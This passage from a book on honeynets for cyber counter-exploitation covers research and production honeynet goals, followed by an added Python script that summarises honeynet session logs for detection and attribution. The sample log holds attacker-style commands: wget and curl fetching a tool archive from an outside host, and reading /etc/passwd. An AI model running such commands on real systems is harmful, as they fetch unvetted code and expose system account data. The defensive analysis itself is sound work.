Reverse Deception: Organized Cyber Threat Counter-Exploitation
Authors: Sean Bodmer
Reduction of false positives
Ability to identify and learn new attacker tools and techniques
Ability to attribute new attacker activity to particular broader problem sets
The following sections briefly discuss the primary two types of honeynets and their advantages and disadvantages.
Research-Based Honeynets
Research-based honeynets are typically found in academic research institutes, or run within organizations as non-requirement-driven research projects that serve personnel as an educational tool. This type of honeynet is typically not managed regularly or held to any specific set of defined standards or reporting requirements. Due to the nature of research-driven honeynets, their goals are generally project or interest based. Research honeynets will generally not be used as an operational test bed unless you have finished reading this book and are planning to research the best practices, tools, and tactics we have recommended and passed on to you throughout this book.
Research-based honeypots are primarily used for the following purposes:
Learn what the bad guys are doing
Study their methods
Capture their keystrokes
Capture their tools
Monitor their conversations
Maintaining individual research-based systems requires a lot of work.
Generation II (GenII) honeynets were originally designed to suit research-based honeynet deployments. This was the second generation of honeynet technologies developed through the Honeynet Project. It is also important to note that most of the organizations that donated resources to the development of GenII were computer science and security research groups within organizations or universities.
Production-Based Honeynets
Production-based honeynets are typically found in larger organizations or government entities that have definitive network defense, intelligence, or counterintelligence requirements. This type of honeynet is generally developed with a full development plan and reporting requirements, and it is based on a strict configuration management plan in order to get the most out of the operational investment.
Production-based honeynets increase the capability of monitoring and analysis for a large enterprise or production network. The following are some of the primary goals of a production honeynet:
Organization protection
Prevent attacks
Detect attacks
Gather intelligence
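The purposes listed for research honeynets (capture keystrokes, capture tools) and the goals listed for production honeynets (detect attacks, gather intelligence) both come down to turning captured session data into something an analyst can act on. The following is an added example, not code from the book or from the Honeynet Project, showing one way to triage honeynet session logs: every login is treated as a confirmed intrusion (a honeynet has no legitimate users, which is why it reduces false positives), the commands typed and the tools fetched are extracted per source, and sources that pull the same tool are grouped so that new activity can be attributed to a broader problem set. The key=value log format and the sample log lines are constructed for this example and do not correspond to any particular honeypot's output.

```python
import re
from collections import defaultdict

# Constructed sample honeynet session log (not from the book). The key=value
# layout is an assumption made for this example; real honeypots each have
# their own formats. Addresses are from the documentation ranges.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z src=203.0.113.5 session=a1 event=login user=root
2024-03-01T10:00:05Z src=203.0.113.5 session=a1 event=cmd cmd="uname -a"
2024-03-01T10:00:09Z src=203.0.113.5 session=a1 event=cmd cmd="wget http://198.51.100.7/tool.tgz -O /tmp/t.tgz"
2024-03-01T10:00:12Z src=203.0.113.5 session=a1 event=cmd cmd="tar xzf /tmp/t.tgz"
2024-03-01T10:02:40Z src=203.0.113.9 session=b7 event=login user=admin
2024-03-01T10:02:44Z src=203.0.113.9 session=b7 event=cmd cmd="curl -s http://198.51.100.7/tool.tgz -o /tmp/t.tgz"
2024-03-01T10:05:00Z src=203.0.113.5 session=a2 event=login user=root
2024-03-01T10:05:03Z src=203.0.113.5 session=a2 event=cmd cmd="cat /etc/passwd"
"""

# key=value pairs; a value is either a double-quoted string or a run of non-space characters.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL_RE = re.compile(r'https?://\S+')


def parse_line(line):
    """Split one log line into a dict: timestamp plus the key=value fields."""
    ts, _, rest = line.partition(' ')
    rec = {'ts': ts}
    for key, val in FIELD_RE.findall(rest):
        rec[key] = val.strip('"')
    return rec


def summarize(log_text):
    """Build a per-source summary of sessions, accounts used, keystrokes and fetched tools.

    Every login is recorded as an intrusion: nothing legitimate should ever
    authenticate to a honeynet, so there is no 'maybe' state to filter.
    """
    summary = defaultdict(lambda: {'sessions': set(), 'users': set(),
                                   'commands': [], 'artifacts': set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        entry = summary[rec['src']]
        entry['sessions'].add(rec['session'])
        if rec['event'] == 'login':
            entry['users'].add(rec['user'])
        elif rec['event'] == 'cmd':
            entry['commands'].append(rec['cmd'])          # captured keystrokes
            entry['artifacts'].update(URL_RE.findall(rec['cmd']))  # captured tools
    return dict(summary)


def shared_artifacts(summary):
    """Map each tool URL to the sources that fetched it, keeping only URLs seen from
    more than one source. Two otherwise unrelated sources pulling the same tool is
    the kind of overlap that lets new activity be attributed to a broader campaign."""
    by_artifact = defaultdict(set)
    for src, entry in summary.items():
        for url in entry['artifacts']:
            by_artifact[url].add(src)
    return {url: srcs for url, srcs in by_artifact.items() if len(srcs) > 1}


if __name__ == '__main__':
    s = summarize(SAMPLE_LOG)
    for src, e in sorted(s.items()):
        print(src, len(e['sessions']), 'sessions,', len(e['commands']), 'commands,',
              'tools:', sorted(e['artifacts']))
    print('shared tools:', shared_artifacts(s))
```

In a production deployment the per-source summary is what feeds the "detect attacks" goal (each entry is a confirmed intrusion, not a suspicion) and the artifact list is what feeds "gather intelligence"; the shared-artifact map is the simplest form of the attribution benefit described at the top of this section.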